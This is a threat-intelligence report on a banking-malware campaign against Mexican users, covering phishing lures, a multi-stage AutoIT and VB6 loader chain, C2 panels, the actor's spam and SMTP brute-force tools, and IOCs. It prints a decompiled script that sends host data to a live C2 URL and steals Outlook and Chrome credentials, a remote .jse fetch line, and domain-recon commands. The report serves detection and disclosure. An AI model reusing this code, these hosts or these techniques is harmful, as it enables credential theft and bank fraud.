Overview

  • Perception Point researchers chose the name for the threat actor, Manipulated Caiman, based on one of the files analyzed, containing the words “Loader Manipulado” in the pdb path. Based on extensive research, the attacker’s origin is likely Latin America, so the researchers chose the caiman reptile to represent the actor.
  • Manipulated Caiman has been active for at least two years, targeting primarily the citizens of Mexico. Based on Perception Point’s research, the potential revenue the group has accumulated is over $55 million.
  • There have been over 4K victims in total, with over 140 victims in the past two months alone.
  • Manipulated Caiman uses a wide arsenal of tools against victims, though its ultimate goal is to gain access to victims’ bank accounts.
  • Manipulated Caiman employs spear phishing with malicious attachments to deliver malware, such as URSA, SMTP bruteforce client, malicious extension installer, net info checker, and spammer client. 

SOC team overloaded? Get a free, fully managed, 24x7 Incident Response service, and save up to 75% of your SOC resources. Learn more.

May 2023 Campaign Analysis

At the end of May 2023, a massive phishing campaign was widely distributed, targeting both individuals and organizations based in Mexico.

The images below display examples of the phishing emails sent by the threat actors:

Each email contained a zip archive that follows the following regex pattern: FACTURA_PDF_XML_\d{6}\.zip

The actor used topics related to CFDI (an electronic invoice format mandated in Mexico) to localize the attack and deceive victims into opening the attachment, which runs the malicious file.

Execution Flow

The attack components span multiple stages. The image below shows the steps involved in the attack:

The execution flow is complex and intricate. In the next section, we will break it down. 

Learn more in our detailed guide about how to prevent phishing attacks.

Initial Execution Trigger

The phishing email’s attachment is actually a .zip archive containing a .url shortcut file. The file accesses and executes a path when run by the user:

URL=file:\\45.81.39[.]154@80\Downloads\FACTURA_ONLINE.jse

FACTURA_ONLINE.jse presents a message box with the text:

“Este mensaje ha sido emitido por error. por favor haga caso omiso.” (English: This message has been issued in error. please ignore).

The script then sends a GET request to the following URL:

https://jogjaempatroda[.]com/redirect/inc3/ex.php?x=1

The script then tries to run the content returned from the request. If the request comes from an IP located in Mexico, the script will run a malicious code in response. This attack uses a form of geofencing, meaning that if the request comes from anywhere outside of Mexico, a legitimate website is displayed and the execution of the script terminates. 

Below you can see the difference in responses to a request that originates within Mexico and to a request that comes from outside of the country:

The malicious response contains two base64 certificates which will both be decoded and saved on the victim’s computer under the following path:

%APPDATA%/lamentacao/habitarao.exe
%APPDATA%/lamentacao/escreverao.a3x

Learn more in our detailed guide to malware detection.

AutoIT Downloader & InfoStealer

Habitarao.exe is the legitimate AutoIT3.exe that is used for execution of AutoIT compiled scripts. (.a3x) It is used to execute escreverao.a3x.

Escreverao.a3x is a compiled AutoIT script that can be decompiled using online tools such as myAut2Exe. We analyzed the script and found that it shares a similar structure with previously disclosed campaigns associated with the URSA Trojan Banker:

Global $SURLINFO = "https://jogjaempatroda.com/redirect/inc3/do/it.php"
If _ISWIN7() Then $SURLINFO = "http://jogjaempatroda.com/redirect/inc3/do/it.php"
FileDelete(@ScriptFullPath)
Local $ISADMIN = "User"
If IsAdmin() Then $ISADMIN = "Admin"
Local $SSERIAL = Hex(DriveGetSerial(@HomeDrive & "\")) & "1"
_ILNKER($SURLINFO & "?b1&v1=" & Dec(@OSLang) & "&v2=" & Dec(@KBLayout) & "&v3=&v4=" & _GETOS() & "&v5=" & $ISADMIN & "&v6=" & @OSArch & "&v7=" & AV() & "&v9=" & $SSERIAL, $SURLINFO)
_OUTRECOVERY()
_CHROMERECOVERY()
_OLISTS($SURLINFO & "?b3&v1=" & Dec(@OSLang) & "&v2=" & Dec(@KBLayout) & "&v3=&v4=" & _GETOS() & "&v5=" & $ISADMIN & "&v6=" & @OSArch & "&v7=" & AV())

The script executes three main operations:

  1. Fetch next stage payload
  2. Create persistence
  3. Outlook & Chrome credentials stealer

The script creates a GET request to the URL:

https://jogjaempatroda[.]com/redirect/inc3/do/it.php

The GET request contains information added by the script:

  • v1 = operation system language
  • v2 = keyboard layout 
  • v4 = operation system
  • v5 = admin privileges
  • v6 = operation system architecture
  • v7 = installed antivirus softwares
  • v9 = default disk serial number

When investigating the script, we first let it run since we did not receive the payload. This was because we sent data from a computer with an English operating system.

The values of v1 and v2 in our case were: 1033 (English – United States)

Because we knew that the campaign was intended for a Mexican audience, we changed the values of v1 and v2 to 2058 (Spanish – Mexico). We received the payload in response to our updated request. The script will later run the following payload:

https://jogjaempatroda[.]com/redirect/inc3/do/it.php?b1&v1=2058&v2=2058&v3=&v4=Windows 7&v5=User&v6=X64&v7=Microsoft Defender

The downloaded payload is saved in the same folder where the executables are located under the name h2kvs7ajf4.

The script then creates two different persistence methods:

  1. Creating a value under the registry key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 
  2. Creating a shortcut file (.lnk) under the startup folder: [Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

The script then executes the downloaded payload.

In parallel to the execution of the next stage payload, the script also steals local Outlook and Chrome credentials, and it then creates a POST request to the following URLs:

https://jogjaempatroda[.]com/redirect/inc3/do/it.php?info=
https://jogjaempatroda[.]com/redirect/inc3/do/it.php?info2=

2nd AutoIT Downloader Script

The previous script downloads a payload which is yet another compiled AutoIT script (.a3x).

After decompiling the file, we can see that the script has several operations:

  1. Sleep for 60~100 seconds.
  2. Arrange a list of C&C domains.
  3. Retrieve the default disk serial number
  4. Send GET request to a C&C domain. 
  5. Handle response from the C&C domain.

Here is an example for a GET request to C&C domain:

http://miningrus1[.]click/system/?h=A1B2-C3D4\1

Below you can see the response we got upon establishing connection with one of the C&C domains:

The script checks for three possible arguments that may be in the response:

  1. .DOW – download and execute executable file (.exe)
  2. .DAW – download and execute AutoIT executable (.a3x)
  3. .DIW – download and execute Windows Installer (.msi)

The response we got contained a .DOW argument, meaning that the script will download and execute an executable file, which is hosted on the following URL:

https://jogjaempatroda[.]com/redirect/inc4/ornot.exe

Loader Manipulado

The executable (ornot.exe) executed by the script is a VisualBasic 6.0 compiled executable:

This executable is actually a dropper malware, containing embedded executable in its resource section:

The executable drops the embedded executable under the following path and immediately execute it:

%APPDATA%/Microsoft/eps2.exe

The dropped executable is also a VisualBasic 6.0 compiled executable:

The first thing we noticed while analyzing the executable is that the threat actor left the project path in the strings:

@*\AC:\Users\Alex Mason\Desktop\Loader Manipulado\Proyecto1.vbp

The path contains the string: “Loader Manipulado” (meaning: Manipulated Loader in Portuguese, which gave us the inspiration for the actor’s name).

Diving deeper into the code we found that the executable has several Anti-VM techniques, including the extraction of the computer’s BIOS version, system model, and comparing them to several versions and models that are known for being part of virtual machine environments:

The executable also compares the language of the OS with those values:

  • 1034 (Spanish – Spain)
  • 1046 (Portuguese – Brazil)
  • 2058 (Spanish – Mexico)
  • 2070 (Portuguese – Portugal)
  • 3082 (Spanish – Spain)
  • 58378 (Spanish – Latin America)

If the language of the infected computer is one of the above, the executable continues to the next anti-VM check which compares the computer name to “JOHN-PC”.

If the checks are passed the executable then moves to another function that contains a number of obfuscated strings:

After deobfuscating the strings we understood the purpose of the function:

The first part of the function looks for the current, active window title. If it contains one of the bank names (BBVA, Banorte, Citibanamex, Santander, Scotiabank) the executable downloads two executable files and saves them under the public folder.

SOC team overloaded? Get a free, fully managed, 24x7 Incident Response service, and save up to 75% of your SOC resources. Learn more.

AutoIT Loader

The executable files are downloaded from the following URLs:

https://www.css-styles[.]com/media/descarga/auit
https://www.css-styles[.]com/media/descarga/btudt

Auit is the same executable as Habitarao.exe (the only difference is the version as Habitarao.exe is version 3.3.16.1 of AutoIT3.exe and Auit is version 3.3.14.5), so it serves the same purpose of executing a compiled AutoIT3 script (btudt).

The decompiled code of btudt contains two primary components:

  1. Embedded executable in the form of a hexcoded blob of data with reversed MZ hex bytes (4D5A).
  2. Function (RBY) that receives the decoded hexcoded executable as an argument; the function contains strings that are decrypted during execution.

The function J is responsible for decrypting the encrypted strings. We wrote a python script (Appendix 1) that replicates the decryption process and prints out the decrypted strings:

Based on the output we found that the strings represent an injection procedure (APIs such as WriteProcessMemory & CreateProcessW).

HolaHola Downloader

By dumping out the hexcoded, embedded executable and converting it to its binary format we observed that the executable is yet another VisualBasic 6.0 compiled executable:

The executable contains an embedded blob of data, encrypted using RC4 encryption. The key for the encryption is: holahola. (For decryption script see Appendix 2).

The decrypted blob of data is a VisualBasic script:

The script sends a POST request to the following URL:

https://www.aplications-update[.]com/a/b/

The request contains several parameters:

  • s = 1 (default parameter)
  • a = id (generated by the script)
  • c = current running processes 
  • b = installed antivirus softwares
  • d = operation system name, version, service pack (if any) and architecture
  • e = the name of the current user

Each parameter value is encrypted using RC4 encryption and the key (holahola).

The response to the request is encrypted using the same algorithm and key; the script decrypts the response and handles the decrypted data. The decrypted data has three fields:

  1. Sleep time
  2. Operation flag
  3. Argument for the operation

There are five operations that can be executed by the script:

  1. Download and execute file
  2. Kill process by ID
  3. Kill process by name
  4. Self deletion 
  5. Download and execute AutoIT file

In our case, the script downloads and executes AutoIT file, and the file is retrieved from the following URL:

https://stats.javas[.]live/media/tareas/injmx

AutoIT Banker: Gaining Access to the Victim’s Bank Account

The retrieved file is a compiled AutoIT script executable. 

The AutoIT banker malware first checks if the current active window contains one of the below browsers:

  • Google Chrome
  • Internet Explorer
  • Microsoft Edge

The banker malware will monitor the browser activity of the user by checking the different URLs accessed by the user and compare it to the URL: “bbvanet.com[.]mx/mexiconet”.

If the user accesses the URL, a forged request will be injected to the browser and steal a local variable value that probably stores the session token of the user.

We created a fake value for the key ixd1 in the local storage of the targeted website and browsed to the website. At the same time, we monitored the network traffic and saw that a forged request was made to the C2 server that included the value of the ixd1 key alongside with the full URL path encoded in base64:

This ends the current campaign. The threat actor gains access to the user’s bank account and can extract all the information desired: account balance, recent actions taken, screenshots and more.

Learn more in our detailed guide on how to prevent malware.

Caiman’s Poor OpSec

In this section we will disclose a number of poor OpSec (operations security) decisions made by the threat actor that led us to unraveling the real volume of the infection, the possible revenue from infections, and some of the tools the threat actor used.

Open RestAPI

Working together with @Merlax_ we found out that the C2 server had a Django REST framework hosted on it, meaning that there was open API URL that we could browse and actually see various data tables. 

The names of the tables are written in Spanish. Here is the translated version of the names:

  • Tasks/run
  • Records
  • Simple_records
  • Injections
  • Angular.js
  • Mov/logs
  • Mov/highs
  • Accounts

The interesting tables are “Records” and “Simple_records” (a mini version of the “Records” table). Those two tables contain the data of the infected users, including their balance, date of infection, latest transactions, and, in some cases, a screenshot of their bank account.

We also can see the total number of infections:

In this C2 server we found over 140 victim logs from the past two months alone.

We didn’t stopped there – together with @Merlax_ we found three more C2 servers that had the same pattern and open rest API access that we found in our C2 server. 

By summarizing all the data we could harvest from those C2 servers, we managed to find over 4K victims in total with a possible revenue of $55 million (please note: this calculation is based on the balance amount at the time of infection). The earliest sign of infection we could trace back was about a year ago.

Panel Login Page

We found a panel login page that was seen in all four C2 servers that hasn’t been previously disclosed anywhere:

Spam Web Panel

Working together with @1ZRR4H, we identified a web panel hosted on several domains presented in the execution flow (miningrus1[.]click and moscow12[.]at):

The panel is used for distributing emails. The actor can modify the sender name, subject, content of the mail, and through which SMTPs the mails will be sent. The actual spamming is done by a botnet. (The spamming payload is explained later).

Both domains are being resolved to the IP: 194.180.48[.]54

While investigating miningrus1[.]click we found a urlscan.io scan that fetched a payload from the domain. Naturally, we started to investigate the payload.

Caiman’s ToolKit

Ascan

Ascan is written in .NET and serves the purpose of brute forcing SMTP servers with poor credentials.  

Ascan generates a random IP address, and will check if it has open SMTP (port 587). Upon a successful hit, the program will start by trying sending a test mail without the validating any authentication (the program will use the username: nouth and a blank password) but if it fails the program begins to iterate through a dictionary of usernames and passwords for the possibility of hitting a poor credentials setup.

The test mail is sent over to “[email protected]with the display name “Rose Amag3

In other samples of the Ascan we found two other recipient mailboxes:

We searched for mailboxes on this relay attempts page, created by researcher Alexey Shpakovsky, and found many attempts for SMTP relay attack. The interesting part here was that most of the IPs which conducted the attacks came from private IP addresses located primarily in Mexico. This led us to the conclusion that upon a successful infection, Ascan (and all the following tools) are downloaded and stored on the victim’s computer as part of a persistence.

ExtInstallShortCut

We observed additional campaigns conducted by the same threat actor which installed malicious browser extensions on the victim’s Google Chrome or Microsoft Edge browser.

The distributed executables contained base64 encoded strings, which, when decoded, reveal the content of the malicious extension:

The extension name was set to “Chrome Notification” to try and manipulate the users to not delete the extension if they notice it.

The extension monitors the current site visited by the user. If the site is one of the targeted sites by the extension, it will redirect the user to a phishing site that impersonates the targeted bank.

Below is a list of the targeted banking sites and phishing sites observed during our analysis:

  • Targeted sites:
    • Bancanetempresarial.banamex[.]com
    • Bancanetempresarial[.]citi
    • banamex[.]com
  • Phishing sites:
    • Citlibamanex[.]group
    • banamexunopaboti[.]run

Learn more in our detailed guide to phishing detection.

SOC team overloaded? Get a free, fully managed, 24x7 Incident Response service, and save up to 75% of your SOC resources. Learn more.

NetInfo

In certain cases, the actor drops (probably on a high value target) the NetInfo executable. This is a simple reconnaissance tool to gather information about the user’s possible domain.

The commands below are executed:

net group \"Domain Admins\" /domain
net group \"domain computers\" /domain
nltest /domain_trusts /all_trusts
nltest /domain_trusts
net view /all

After the commands are executed, a concatenated string (which contains the response of each executed command) is sent via a POST request to one of the actor’s domains.

Spmr

Spmr.exe is the spamming tool used by the actor to conduct the phishing campaign.

It uses the infected machines as spamming stations to send out phishing emails.

The tool starts by fetching the campaign configuration information using a GET request to a hardcoded C&C URL.

The URL may have three possible responses:

  • EXIT; – the campaign was terminated.
  • WAIT; – the campaign hasn’t started yet, try again later.
  • Campaign data – will contain the hash of the configuration, and the spam list.

The configuration data itself is hosted on another URL which is built as an XML document and has nine data fields which are base64 encoded. The tool decodes those values and uses them for establishing the spamming campaign.

The fields are:

  1. Sender name
  2. Subject
  3. Sending method
  4. Sending content type
  5. Body content
  6. SMTP list
  7. Links
  8. Attachment name
  9. Attachment URL

The tool then proceeds with conducting the spamming campaign by relying on SMTP found previously (by the Ascan tool) and sending it out to the spam list.

Diamond Model

SOC team overloaded? Get a free, fully managed, 24x7 Incident Response service, and save up to 75% of your SOC resources. Learn more.

IOC’s

Files – 

  • Ascan3.exe – 723066334431437f6368ffa748ac0831ce2f30fd035924ea36d8c3f14f133231
  • AScan.exe – 052a0df6ac8d19e8479e80bfd1d98885742bfd00558cac93316b8b6cf38d5500
  • AScan.exe – c3f57b71ce0093244e8f71024d014558d7d987719ff852100dfd6ff2bee3a57d
  • netinfo.exe – d050e1c4659ed8c8479487ce0099f8e566550dd41981143ba15fad80fa8dc535
  • Checker.exe – d96173cba6bd8a8e854811ca92e72ce8118031d33db33a2e9a3d47154337e482
  • Spmr.exe – b5ebe2001d82980bec26244f99248f846ee672d86e1a4ac371896f907642378f
  • Spmr.exe – 203cc5d525b0583b3db0552fd4af4cfd970bdd8b97ae8d210ee95c4c9f971e44
  • Spmr.exe – 1b18c0e660ab85afaf1debd63387725d2d01640a88f5913107e67a18205caee3
  • Spmr.exe – c16984b4c30a9f7943596a7843f7b71647b025d65dd9194a2cf7e6365177dd5d
  • ext.exe – b2758ff0ff45ea8eff93ce663784f5f54b3e118fe674fc9b9a5f37c444fa2eb0
  • ext.exe – 7a7ac75052a6e43cfabbabc30c5b6e01c253a49080a37ada098ee84011c6b897
  • ext.exe – 62dad15b1ea38139a420de6449e8b7bffde6c8d11018775c5772743b9d7891de
  • ext.exe – 49522e910929b94a10bd466381a2fd2efafb3aa3d2b65c8840a3f6fc9f00334a
  • FACTURA_ONLINE.jse – 45e03985103b25828e3d01a415958639db0aed53564455908dab35c803e69fcd
  • 3664.jpg (autoIT) – feb67d49cc0b50749754a2e2f00c1ba1080ad25ea93df017c9780ffebf2b501c
  • Ornot.exe – 85286559057867ef0886a4248f41fcb520f093bc862b97aa6ecc559f05ff7a61
  • Btudt.a3x – 9028937f280b606a5599dcb97a17805f89d15522dd3268b00744fefa62e06fcf
  • Injmx.e3x – 3fcee6f10ab1490d0552b3706a68c3a10c585bfbf8b7440a23edad8f23bcb085
  • Escreverao.a3x – 3df64dc17c397ef25702a74a2f5dc97eaed4e48b13e52e2735a9b32894fc09e7

IPs –

  • 45.81.39[.]154 
  • 104.156.149[.]33
  • 45.153.240[.]94
  • 199.188.204[.]241
  • 64.44.135[.]207
  • 162.0.236[.]9
  • 199.192.21[.]166

Domains –

  • jogjaempatroda[.]com
  • miningrus1[.]click
  • miningrus2[.]click
  • miningrus1[.]site
  • moscow12[.]at
  • css-styles[.]com
  • aplications-update[.]com
  • javas[.]live
  • js-angular[.]com
  • network[.]org
  • ksksksksk[.]at
  • hostxbay[.]com
  • russk22[.]icu
  • ccsstilos[.]com
  • cssangular[.]com
  • angularcss[.]com

SMTP relays recipients – 

  • test@hostxbay[.]com
  • r9900u@rambler[.]ru
  • r9900u@gmail[.]com

Appendixes

Appendix 1 – Python Script For btudt Strings Decryption

strings = ['UHAIRISHOJEJBJFIIJEGUJCIKIHJDILFPFKIHJJJDILIAFKFHFOFHGUIOIUIGJCJIHIIKIUFPFMIHGUIOIUIGJCJIFRFHFOFHFKICFKFQ', 'JPKRGQKRBPKJHJIPIPIODQERJQAMBRARDRCJHODPKRDPKRCRFQAPJMCQKRERBJIMKQARCQGRDQKQKMCQKRERBJIOEQERDQHPKMCPJRHQJRCPJJIOIMCPJRHQJRCPJJIOJMCPJRHQJRCPJJIOIOEQDRKPKMCPJRHQJRCPJJIOJOEQDRKPKMCPJRHQJRCPJJIOIMKQJRFQIREMJQDPGRCRCMCPJRHQJRCPJJIOJMKQJRFQIREMJQDPGRCRCMCPJRHQJRCPJJINBQEQGQHMHRERDRCQDPIREREPKMCPJRHQJRCPJJINBQHPGQCRCMCRGQKRBPKJHOEQCQKRGOIQDQJPJQKRGMCRGQKRBPKJHODPKRDPKRCRFQAPJLEMBRARDRCJHODPKRDPKRCRFQAPJLEMBRARDRCJHQDODREPJNFQIRAREREMBRARDRCJHQDODREPJOAREREQKRFRDMCQKRERBJIQCOERDPKNARCRBQKRB', 'OMAMDMCGPKAMBLPLCLFMCMDIKMAMDMCGPKELHMCLELBLDILLDMHLOMCLDHAJPMCLOLDLEMDMCJJLDILLDMHLOMCLDHAKDLIMBLFLALEJILE', 'SHLJRJFJAKAJEIEJRJPJCJFJSJTIK', 'NKJMMMKLMMAMNMO', 'OKELHMCLELBLD', '[GYHOHHHJGYELFTHGHGHLGZHPHMFVHEGUG\HKFLGXHPHGHKGXEMFTHKE\FLELGYHOHHHJGYELFUHJFBFKEMGXHPHGHKGXEMFTHKFBFLELGYHOHHHJGYELFUHJFDFKEMGXHPHGHKGXEMFTHKFFFLELGYHOHHHJGYELFUHJFHFKGYHOHHHJGYELFTHGHGHLHKHGHEGKHHHJGYFKEMGXHPHGHKGXEMGGHMGUHMHMHLGKHHHJGYFKEMGXHPHGHKGXEMGHGVG[GLHGHKGXFLELGYHOHHHJGYELFVHJHKHGHKGCG[GZHLGYHMFKEMGXHPHGHKGXEMFUHKHJHHHJGHGYHEGYGXHLHHHJFLELGYHOHHHJGYELFUGUHMGUGDGZG[HKGZHLFLELGYHOHHHJGYELFUGUHMGUGHGYHEGYGXHLHHHJFLELGWHQHMGYEMGFGZG[HBHKHMGYHKFQHKGYGVGOFIE\GRFKEMGXHPHGHKGXEMFSHKE\GCHHHQGGHMGUHMGYFLGXHPHGHKGXEMGGGZG[FXHKFLELGYHOHHHJGYELGHGYG\FVHLFKEMGXHPHGHKGXEMGGGZG[FVHKFLELGYHOHHHJGYELGHGYG\FTHLFKGYHOHHHJGYELFVGXHBFKEMGXHPHGHKGXEMFUHLHAFLELGYHOHHHJGYELFVGVHQFKEMGXHPHGHKGXEMFUGYHPFLELGYHOHHHJGYELFVGWHQFKEMGXHPHGHKGXEMFUGVHPFLGXHPHGHKGXEMFUGWHHFLELGYHOHHHJGYELFVHAHIFKEMGXHPHGHKGXEMGGGZG[FTHKFLELGYHOHHHJGYELFVFVHEGUG\HKFLELGYHOHHHJGYELFVHKHIFKEMGXHPHGHKGXEMGGGZG[GHHKFLGVHRHLGZELFVHPHMGYHGGXGZGXGGGYG\HAHLHLGZHJHLGOFFFAFCGQ', 'KOHOLOFPJJAMIOFOKPBOGNLKFOBLCQDPGPKOHJALJQFPLOJPKMLPFMIOEPLPLNAOEOLOILDQCPHPJOIILNAOEOLOIPLLCQDPGPKOHJANBOJPDPHOGOFPLPBPGPGPKLDQCPHPJOIILNDPAQGOIPHOJMEOIOFOHOJPJLDQCPHPJOIILMJPAPGPAPFQAPFMAQEPLPKOELDQCPHPJOIILMJOEQEPAPFQAPFMAQEPLPKOELDQCPHPJOIILNDNCLDQCPHPJOIILNDMLLDQCPHPJOIILLLOLOJOGPDPKQBPELDQCPHPJOIILMFMLLDQCPHPJOIILLLNCLDQCPHPJOIILNCOIPEPGOHOEQAPAPHPFLDQCPHPJOIILMLQBOJPJPEOEQFLCOHOLOFPJJANBOJPKOJPJQCOIOINKLAOALDQCPHPJOIILMLMAMJMEOIOIPGPLPBOJPBOIPKLCQDPGPKOHJAMKMBMIMFPFOKPGPKPEOFPLPBPGPGLCOHOLOFPJJANBOJPKOJPJQCOIOIKFNLKFKEOALDOHQDPGPKOHJALIOIOHPKOIPLPKMLOJMKOIQDMAQEOIMEOIOFOHOJPJ', 'ZHVHMHQHBEPGFG[HAHGHGHMHCFPHUHNHPHCEOGHHSHLG[HDHPGIHDGMHCHBHRHHHMHMHQFPHBHVHMHQHBEPGMHHHKHDFXG[HRHDGLHSGZHLHNFPHBHVHMHQHBEPGIHNHGHMHRHDHPGNHMGMHWHLG[HNHJGNGZHAHJHDFOHCHUHNHPHCEOGHHSHLG[HDHPGIHDGMHWHLG[HNHJHRFOHVHMHQHBEPGLHHHXHDGHHEGHHOHRHHHMHMGZHKGAHDGZHCHCHQFOHVHMHQHBEPFWHGGZHQGZHBHRHDHPHHHQHSHGHBHQ', 'PLNLELIKKGLJEKIKNKQKJIEKILPLJKMGKJFKHLALELIJDKQLDLBKLLIJNKMLHLJKPLFLDIEKILPLJKMGKJFKPLELELIJDKQLDLBKLLIJNKMLHLJKPLFLDIEKKLNLELIKKGLJKKQLPKMJGKNILLFKKKMIDKLLMLFLHKLGKJLKPLQKLJHKMJBLDKQLJKQKHLCKPLQKLKLIMKILJKIIDKLLMLFLHKLGKJLKPLQKLJHKMJNLDKQLDKQLJKQKHLCKPLQKLKLIMKILJKIIDKLLMLFLHKLGKIKKKKLLHKMLILJJGKNINLELJLILOJILEKQLDLKIDKLLMLFLHKLGKILKHLJKLJHKMIMLEKLKLIEKKLNLELIKKGLIKKILIKMJGKNIMKILJKIIDKLLMLFLHKLGKJBLCKIKNKMIKKILIKMIDKLLMLFLHKLGKJLKLKKLJKQLELEIJLCKPKOLDLDKLLELJIEKKLNLELIKKGLIOKQLBKMIJLCKPKOLDLDKLLELJIELMLFLHKLGKJFKHLALELIJGLGKLLIKHLKKPLEKNJLLOLJLJKMLCJOKLLILIKQLELEIDLNLELIKKGLJEKQLDLFLHJHLFKMLHKILJKQLDKOJKLPLILKKLLDJNKMLHLJKPLFLDIELMLFLHKLGKJFKHLALELIJALDKHKOKLJOKLLILIKQLELEIDLNLELIKKGLJEKQLDLFLHJBLCKIKNKMJNKMLHLJKPLFLDIELMLFLHKLGKJFKHLALELIJKLLKILJLOLJLJKMLCJOKLLILIKQLELEIDLNLELIKKGLJEKQLDLFLHJLLKKJLILPLILKKLLDJNKMLHLJKPLFLDIEKKLNLELIKKGLJOKQLDHNHLJOKLLILIKQLELEJNKILBLLKLIEKKLNLELIKKGLJKKQLPKMJGKNJALDKHKOKLIEKKLNLELIKKGLJKKQLPKMJGKNIQKMKHKLKLLILIIEKKLNLELIKKGLILKPKLKKLAJLLKLDIDLNLELIKKGLJKLLKILJLOLJLJKMLCIELMLFLHKLGKINLBLCILKPKHLIKHKKLJKMLHKQLILKKPKKLIIEKKLNLELIKKGLJKKQLPKMJGKNJKLKKHKKLAJKKLLJKLLILLKMIDKLLMLFLHKLGKJLKPLQKLJHKMJLLJKIKJLBILLFLCLDKPLKIDKLLMLFLHKLGKJLKPLQKLJHKMJAKLKILFJKKLLJKLLILLKMIDKLLMLFLHKLGKJLKPLQKLJHKMJAKLKILFIMLELDLCKQLJIEKKLNLELIKKGLJDLFKHKLKLLIIOLCKHKOLIIEKKLNLELIKKGLJFLLLCKJKLLIJGKNJJLMKHIKLDKLJKKQLPKMLI', 'XGHHVHWGVIFICIGHMIFGJHPIEGHHKIFHKFEEYIFGLGQGDGKGHHJGRGTGWGMGRGRGDGPHIGLGHGEGGGIGUFIEUHUFDEXHBGKGHGLGQGLGRGMGFGLGSGMGGGMGHGKGUGLGTGKGKGLHCGMGHGMGGGMGMGKGWGLHCGLGWGLHBGMGIEXFEFF', 'THGJDJEHUJMJJJNIPJMHIISJLHGINJMINFUFPJMHKHPHCHJHGIMHQHSIAHLHQHQHCHOILHKHGHDHFHHHTGDFLJCFTFOIHHJHJHKHCHKHUHJIFHJHFHJIGHIIFHJIFHJICHJIEHJIGHKHLHKHNFOFUGA', 'THGJDJEHUJMJJJNIPJMHIISJLHGINJMINFUFPJMHKHPHCHJHGIMHQHSIAHLHQHQHCHOILHKHGHDHFHHHTGDFLJCFTFOIGHJHEHKHMHJIHHKHGHKHFHIICHJIHHKHSHKHFFOFUGA', 'THGJDJEHUJMJJJNIPJMHIISJLHGINJMINFUFPJMHKHPHCHJHGIMHQHSIAHLHQHQHCHOILHKHGHDHFHHHTGDFLJCFTFOHPHNHOHPHFHQHIHOHQHNHKHPHCHNHEHPHJHOHNHPHDHPHCFOFUGA', 'JPJQCPHRBJINJPHQHQAPALKPCMCPJRHQJRCPJJIOFQJQDQKQIOAQAOHQDRCRDRFPGQHODQERJQAMHQJPJOBQCRJRCQEPIPHQGMIPJPKRBQARCRDMBPKRGQKRBPKJHOHQDRCRDRFPGQHMHPKPJRCPKRDRCMCPJRHQJRCPJJIODQERJQANKQBOCPHRGNAPGREPGMCPJRHQJRCPJJIOAQKQDQJRDQARBOFQJODPGRHMKPHRDPHMBPKRGQKRBPKJHOBQJQEQIREPKRCOEQKOCQAQGQKPIPHRDQEQJQJRCMCPJRHQJRCPJJIOAQKQDQJRDQARBOFQJNIQDQJPKQJREQIPHQARBRDMBRHQJRCPJJINJRFQHPIPKRCNKQBOCQAQGQKPIPHRDQEQJQJRCMCRGQKRBPKJHNKREQIPHQARBOAQANIQDQJPKQJREQIPHQARBRDMBPKRGQKRBPKJHMKQCPHRBPHPIREPKRCQDRDRDQEPIRD', 'JPIRIREPKJINEQJQCQARBQERDQAPJMIPJPKRBQARCRDODRAPGPJPKMCPHRJRDQAJHODPKPHPJNFQHPHQBQANBQEQGQANARIPKPJNKRARDQEQJQJRCMCPHRJRDQAJHMJPKQEQIQCMKQAPHRFQBQCPKPKMBPIRIREPKJIODRAPGRCPKMCQKRERBJINIRFRDPHQIREMBRARDRCJHNFQHPHQBQAMIPHRCQAMHPKPJRCPKRDRCMCQKRERBJINHQKPGPKPKRCMKPHRDPHMBRARDRCJHOBRBQKPIQARCRDOAPHRBPHQHQARDQARBRDMBRARDRCJHOEREPIODRJRCREPKQIMKPHRDPHMBRARDRCJHOBRBQKPIQARCRDNDQAPGRAMBRARDRCJHNCPGRDRDOBPKPINHQKPIQGMBRARDRCJHNCPGRDRDOBPKPINHQKPIQGOCQKREREQDQJPKMCQKRERBJINBPHRCREOAQAPHOGQIQHQJPJQFODQJRFRDQEQIQAMBPKRGQKRBPKJHNBQIRGQDRCQJQJQHQAQIREOFRAPJPHRDQAMJQKREQJRDMCQKRERBJINGQARBQJPKQHMJPHQGQHPHPHPIQGOEPHPHQHPKMCQKRERBJINARGPKQJRDNIQJQCODQAPIREQDQKQIMCQKRERBJINARGPKQJRDNIQJQCMBRARDRCJHNCRBQAPKNIQDRDRDMCPJRHQJRCPJJIOEQHRCNBRHRAPGQJRCQEQJQJMJQKREQJRDQARBMCQKRERBJIOEQHRCMJQDREQHPHQKMCPJRHQJRCPJJIOEQHRCMJQDREQHPHQKMJQDRERCPBLDPDMBRARDRCJHODPKPHPJOAQIQHRIOEQCPHRBQAPJNJPKQIQJRCRIMJPGRDPKMCQKRERBJIOCQAPGPKNKQJQGRJODQDPGRCPKPKNIQAQHQKRBRJNDQAPGRAMBRARDRCJHODPKPHPJOAQIQHRIOERDPHRDQEPIOEPKRCRFQARBNAPGREPGMCQKRERBJIMHQJRCQEMJQKPJQAOAPHQBQAMKPHRDPHMBRARDRCJHOAPKQIMJQKPJQAOAPHQBQAMKPHRDPHMBRARDRCJHOGQIQEPIQKPJQAMJPHRCQAOEPHPHQHPKNAPGREPGMCPJRHQJRCPJJINJRFQHPIPKRCNKQBOARCQJPJPKRDRCQKRBRDMBPKRGQKRBPKJHNKRDNDQGQKPHPHQGNCQGPHQBMCPHRJRDQAJHOEQKPHRBQALDPBLFPDMBQEQIRELHLGJHMKRBQERDQEPIPHQGOEPKPJRDQEQJQJOEQEQHQAQJRFRDMCPJRHQJRCPJJINDQAPGRAODQAQBQIPKQJRDODPKRDPKRCRFQAMBPKRGQKRBPKJHNEPKPHQKOEPKQCQHQAQIREMJQKQHQIQDREMBPKRGQKRBPKJHNEPKPHQKNAPKMKQJQIQHQERDOFQJREPGQHNBRCPKQAOEQDRBQARCQDQJQHPJMCPJRHQJRCPJJINDQAPGRAMKQAMJQKQHQIQDRENBRCPKQAMIQHQJPJQFOFQCRCPKRDQCQKQGPKMBPKRGQKRBPKJHNKREQIPHQARBOAQANEPKPHQKRDMBPKRGQKRBPKJHNJPGRIQDQIREQINJRFQHPIPKRCNKQBNDQAPGRARCMCQKRERBJIOARCQJPJPKRDRCNEPKPHQKRDMBRARDRCJHNDPJQEODQDPGRCPKPKNDPHQIPKQGQAOEPHPHQHPKMCQKRERBJIOARCQJPJPKRDRCOERDPHRBREPKRCNDQAQGRAPKRCMBRARDRCJHNDPJQEMKMKMHRERDRCQDPIREREPKNIQDRDRDMCQKRERBJINHQKPGPKPKRCNHQKPIQGMBPKRGQKRBPKJHOAODNJPGQFQJRCOGQA